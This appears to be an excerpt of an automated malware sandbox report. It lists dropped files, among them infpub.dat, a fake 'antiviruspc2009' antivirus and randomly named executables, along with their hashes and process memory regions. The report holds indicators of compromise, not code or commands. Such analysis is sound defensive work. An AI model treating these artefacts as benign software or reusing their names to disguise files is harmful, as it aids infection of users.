SHA256 4f0033e811fe2497b38f0d45df958829d01933ebe7d331079eefc8e38fbeaa61
SHA512 232fedec0180e85560a226870a244a22f54ca130ed6d6dc95dc02a1ff85f17da396925c9ff27d522067a30ee3e74a38adff375d8752161ee629df14f39cf6ba9

memory/456-209-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 cb02c0438f3f4ddabce36f8a26b0b961
SHA1 48c4fcb17e93b74030415996c0ec5c57b830ea53
SHA256 64677f7767d6e791341b2eac7b43df90d39d9bdf26d21358578d2d38037e2c32
SHA512 373f91981832cd9a1ff0b8744b43c7574b72971b5b6b19ea1f4665b6c878f7a1c7834ac08b92e0eca299eb4b590bf10f48a0485350a77a5f85fc3d2dd6913db3

memory/2084-171-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 0a7b70efba0aa93d4bc0857b87ac2fcb
SHA1 01a6c963b2f5f36ff21a1043587dcf921ae5f5cd
SHA256 4f5bff64160044d9a769ab277ff85ba954e2a2e182c6da4d0672790cf1d48309
SHA512 2033f9637b8d023242c93f54c140dd561592a3380a15a9fdc8ebfa33385ff4fc569d66c846a01b4ac005f0521b3c219e87f4b1ed2a83557f9d95fa066ad25e14

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 248aadd395ffa7ffb1670392a9398454
SHA1 c53c140bbdeb556fca33bc7f9b2e44e9061ea3e5
SHA256 51290129cccca38c6e3b4444d0dfb8d848c8f3fc2e5291fc0d219fd642530adc
SHA512 582b917864903252731c3d0dff536d7b1e44541ee866dc20e0341cbee5450f2f0ff4d82e1eee75f770e4dad9d8b9270ab5664ffedfe21d1ad2bd7fe6bc42cf0e

memory/2784-218-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 3ed3fb296a477156bc51aba43d825fc0
SHA1 9caa5c658b1a88fee149893d3a00b34a8bb8a1a6
SHA256 1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423
SHA512 dc3d6e409cee4d54f48d1a25912243d07e2f800578c8e0e348ce515a047ecf5fa3089b46284e0956bbced345957a000eecdc082e6f3060971759d70a14c1c97e

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 3ed3fb296a477156bc51aba43d825fc0
SHA1 9caa5c658b1a88fee149893d3a00b34a8bb8a1a6
SHA256 1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423
SHA512 dc3d6e409cee4d54f48d1a25912243d07e2f800578c8e0e348ce515a047ecf5fa3089b46284e0956bbced345957a000eecdc082e6f3060971759d70a14c1c97e

memory/2968-223-0x00000000020F0000-0x00000000021BE000-memory.dmp

memory/2784-224-0x0000000000400000-0x0000000000439000-memory.dmp

memory/2968-220-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/3480-219-0x00007FF894610000-0x00007FF8950D1000-memory.dmp

memory/1572-232-0x0000000000000000-mapping.dmp

memory/2964-239-0x0000000000400000-0x0000000000415000-memory.dmp

C:\Windows\infpub.dat

MD5 1d724f95c61f1055f0d02c2154bbccd3
SHA1 79116fe99f2b421c52ef64097f0f39b815b20907
SHA256 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648
SHA512 f2d7b018d1516df1c97cfff5507957c75c6d9bf8e2ce52ae0052706f4ec62f13eba6d7be17e6ad2b693fdd58e1fd091c37f17bd2b948cdcd9b95b4ad428c0113

memory/4704-252-0x0000000000000000-mapping.dmp

memory/4456-257-0x0000000000000000-mapping.dmp

memory/1120-258-0x0000000000400000-0x0000000000434000-memory.dmp

memory/4168-270-0x0000000000000000-mapping.dmp

memory/4168-275-0x0000000000560000-0x000000000069B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 d5e5853f5a2a5a7413f26c625c0e240b
SHA1 0ced68483e7f3742a963f2507937bb7089de3ffe
SHA256 415dd13c421a27ed96bf81579b112fbac05862405e9964e24ec8e9d4611d25f3
SHA512 49ea9ab92ce5832e702fac6f56a7f7168f60d8271419460ed27970c4a0400e996c2ea097636fc145e355c4df5cfbf200b7bf3c691133f72e4cad228f570b91e4

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 d5e5853f5a2a5a7413f26c625c0e240b
SHA1 0ced68483e7f3742a963f2507937bb7089de3ffe
SHA256 415dd13c421a27ed96bf81579b112fbac05862405e9964e24ec8e9d4611d25f3
SHA512 49ea9ab92ce5832e702fac6f56a7f7168f60d8271419460ed27970c4a0400e996c2ea097636fc145e355c4df5cfbf200b7bf3c691133f72e4cad228f570b91e4

memory/1572-272-0x00000000007E0000-0x0000000000848000-memory.dmp

memory/3212-268-0x0000000000400000-0x0000000000CFB000-memory.dmp

memory/2784-264-0x0000000000400000-0x0000000000439000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 e1b69c058131e1593eccd4fbcdbb72b2
SHA1 6d319439cac072547edd7cf2019855fa25092006
SHA256 b61c53f4137c41aa0a5538fc9a746034b3a903cc4b1b3c8b5f3d3118e1e2bd8f
SHA512 161a5923dc3a6507cbee3b547edcef4fbfe1dc6a04832c2472b1e635d758d1503a61361c2a83a13a0d8e4607516fda4ae6462a74df66b20a7c93174bbcc7129c

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 e1b69c058131e1593eccd4fbcdbb72b2
SHA1 6d319439cac072547edd7cf2019855fa25092006
SHA256 b61c53f4137c41aa0a5538fc9a746034b3a903cc4b1b3c8b5f3d3118e1e2bd8f
SHA512 161a5923dc3a6507cbee3b547edcef4fbfe1dc6a04832c2472b1e635d758d1503a61361c2a83a13a0d8e4607516fda4ae6462a74df66b20a7c93174bbcc7129c

C:\Users\Admin\AppData\Local\Temp\is-M3M1Q.tmp\is-9U52M.tmp

MD5 19672882daf21174647509b74a406a8c
SHA1 e3313b8741bd9bbe212fe53fcc55b342af5ae849
SHA256 34e6fea583cf1f995cf24e841da2060e0777405ac228094722f17f2e337ccea8
SHA512 eceddd4f1bbaf84dde72642f022b86033ba5a8b5105c573adcc49946d172e26e2512edce6f99e78dd3a2b0f8a23fa6138cca995a824e5f53a6ba925de434fa8f

C:\Users\Admin\AppData\Local\Temp\is-M3M1Q.tmp\is-9U52M.tmp

MD5 19672882daf21174647509b74a406a8c
SHA1 e3313b8741bd9bbe212fe53fcc55b342af5ae849
SHA256 34e6fea583cf1f995cf24e841da2060e0777405ac228094722f17f2e337ccea8
SHA512 eceddd4f1bbaf84dde72642f022b86033ba5a8b5105c573adcc49946d172e26e2512edce6f99e78dd3a2b0f8a23fa6138cca995a824e5f53a6ba925de434fa8f

memory/4332-255-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 0315c3149c7dc1d865dc5a89043d870d
SHA1 f74546dda99891ca688416b1a61c9637b3794108
SHA256 90c2c3944fa8933eefc699cf590ed836086deb31ee56ec71b5651fd978a352c9
SHA512 7168dc244f0e400fa302801078e3faec8cdd2d3cb3b8baaab0a1b3c0929d7cf41e54bfbe530ad5ce96a6b63761f7866d26aaae788c3138c34294174091478112

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 0315c3149c7dc1d865dc5a89043d870d
SHA1 f74546dda99891ca688416b1a61c9637b3794108
SHA256 90c2c3944fa8933eefc699cf590ed836086deb31ee56ec71b5651fd978a352c9
SHA512 7168dc244f0e400fa302801078e3faec8cdd2d3cb3b8baaab0a1b3c0929d7cf41e54bfbe530ad5ce96a6b63761f7866d26aaae788c3138c34294174091478112

memory/1564-250-0x0000000000000000-mapping.dmp

memory/3516-248-0x0000000000000000-mapping.dmp

memory/2232-247-0x0000000000000000-mapping.dmp

memory/2136-271-0x0000000000000000-mapping.dmp

memory/4724-276-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\antiviruspc2009\libltdl3.dll

MD5 00a71b4afda8033235432b1c433fecc7
SHA1 d7b0c218aa8fec1c60ada26a09d9e0d9601985ca
SHA256 f9c9d2b92efb80f6d11df52735b8bddd099847cc79ba56650793b21a0923b1cd
SHA512 96635e66d9781ad4d2414271f6a0904cf880ed94fc19186ef4da5f88f24e14ef1591fdc90e27db15a6021847c592688d0034f20e2e50ca93bf8c6db27e8c510a

C:\Program Files (x86)\antiviruspc2009\bzip2.dll

MD5 4143d4973e0f5a5180e114bdd868d4d2
SHA1 b47fd2cf9db0f37c04e4425085fb953cbce81478
SHA256 da25db24809479051d980be5e186926dd53233a76dfe357a455387646befca76
SHA512 e21827712a4870461921e7996506ffe456dd2303b69de370aa0499dde2e4747a73d8c0e8bd7d91c5bbc414ed5ee06f36d172237489494b3dd311ccd95ba07ebc

C:\Program Files (x86)\antiviruspc2009\libltdl3.dll

MD5 00a71b4afda8033235432b1c433fecc7
SHA1 d7b0c218aa8fec1c60ada26a09d9e0d9601985ca
SHA256 f9c9d2b92efb80f6d11df52735b8bddd099847cc79ba56650793b21a0923b1cd
SHA512 96635e66d9781ad4d2414271f6a0904cf880ed94fc19186ef4da5f88f24e14ef1591fdc90e27db15a6021847c592688d0034f20e2e50ca93bf8c6db27e8c510a

memory/3448-282-0x0000000000000000-mapping.dmp

memory/3448-283-0x0000000000400000-0x0000000000A35000-memory.dmp

memory/4144-286-0x0000000000000000-mapping.dmp

memory/4456-287-0x0000000001140000-0x0000000001287000-memory.dmp

memory/3940-290-0x0000000000000000-mapping.dmp

memory/1796-295-0x0000000000400000-0x0000000000843000-memory.dmp

memory/4304-294-0x0000000000000000-mapping.dmp

memory/2184-296-0x0000000000000000-mapping.dmp

memory/4872-292-0x0000000000000000-mapping.dmp

memory/3448-291-0x0000000000400000-0x0000000000A35000-memory.dmp

memory/1516-289-0x0000000000000000-mapping.dmp

memory/1796-284-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

MD5 c18a7323332b3292a8e0f1c81df65698
SHA1 bcb8f34cbe0137e888d06acbcb6508417851a087
SHA256 9c42eca99e96a7402716fd865b57ea601fb9a18477fe2ab890bdbcd3052f68f8
SHA512 4d48d11f3d0a740b9193e17782c77b01f52dd6e8324755aa81188295a0caed0718d330453bb02ca8bc942ee5588928e57a0d89d90d6b1c32690338c5eae8e1ad

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

MD5 c18a7323332b3292a8e0f1c81df65698
SHA1 bcb8f34cbe0137e888d06acbcb6508417851a087
SHA256 9c42eca99e96a7402716fd865b57ea601fb9a18477fe2ab890bdbcd3052f68f8
SHA512 4d48d11f3d0a740b9193e17782c77b01f52dd6e8324755aa81188295a0caed0718d330453bb02ca8bc942ee5588928e57a0d89d90d6b1c32690338c5eae8e1ad

memory/1572-249-0x00000000007E0000-0x0000000000848000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 02f471d1fefbdc07af5555dbfd6ea918
SHA1 2a8f93dd21628933de8bea4a9abc00dbb215df0b
SHA256 36619636d511fd4b77d3c1052067f5f2a514f7f31dfaa6b2e5677fbb61fd8cba
SHA512 287b57b5d318764b2e92ec387099e7e313ba404b73db64d21102ba8656636abbf52bb345328fe58084dc70414c9e2d8cd46abd5a463c6d771d9c3ba68759a559

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 02f471d1fefbdc07af5555dbfd6ea918
SHA1 2a8f93dd21628933de8bea4a9abc00dbb215df0b
SHA256 36619636d511fd4b77d3c1052067f5f2a514f7f31dfaa6b2e5677fbb61fd8cba
SHA512 287b57b5d318764b2e92ec387099e7e313ba404b73db64d21102ba8656636abbf52bb345328fe58084dc70414c9e2d8cd46abd5a463c6d771d9c3ba68759a559

C:\Windows\infpub.dat

MD5 1d724f95c61f1055f0d02c2154bbccd3
SHA1 79116fe99f2b421c52ef64097f0f39b815b20907
SHA256 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648
SHA512 f2d7b018d1516df1c97cfff5507957c75c6d9bf8e2ce52ae0052706f4ec62f13eba6d7be17e6ad2b693fdd58e1fd091c37f17bd2b948cdcd9b95b4ad428c0113

C:\ProgramData\vyQwMwog\xsskQcks.exe

MD5 bf65ca650d930636d49ab71b324eaf60
SHA1 acd4a3bcd8104c8071e22dae2f2e47a0bc849810
SHA256 a485dd8c57874bc422e355d576e71b8942fe0d0f31b1826bc2c329696e67bd20
SHA512 dc266bd85e732e985014bb616f81a924d29ddc221258d6127ca41d550f519c7dcf84fba8bebc56f69678973ae90415b0b3014dea0e540388cbb18603e5b796e6

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 0002dddba512e20c3f82aaab8bad8b4d
SHA1 493286b108822ba636cc0e53b8259e4f06ecf900
SHA256 2d68fe191ba9e97f57f07f7bd116e53800b983d267da99bf0a6e6624dd7e5cf7
SHA512 497954400ab463eb254abe895648c208a1cc951ecb231202362dadbe3ffb49d8d853b487589ce935c1dc8171f56d0df95093ffc655c684faa944c13bcfd87b8b

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 fbbdc39af1139aebba4da004475e8839
SHA1 de5c8d858e6e41da715dca1c019df0bfb92d32c0
SHA256 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
SHA512 74eca8c01de215b33d5ceea1fda3f3bef96b513f58a750dba04b0de36f7ef4f7846a6431d52879ca0d8641bfd504d4721a9a96fa2e18c6888fd67fa77686af87

C:\Users\Admin\MooskccM\OgMMAEUs.exe

MD5 0c0a0b8b70462930cd4ea9f808867ef3
SHA1 6c64b1e07b8d99e3ccda2592ce870443ad8fd018
SHA256 557f3d8d8aa62543296f01161a0be511baa17acf20eb42e364d082ab3b2f8a69
SHA512 c7b7fc1c488fdeec12d507789b6fe132d7b1c2dc4b3c67c0b010db4d9c190fa6ec166f0edbd018fd0269fd939d4f55454c2f670b98e958b1282ab04e06b0e609
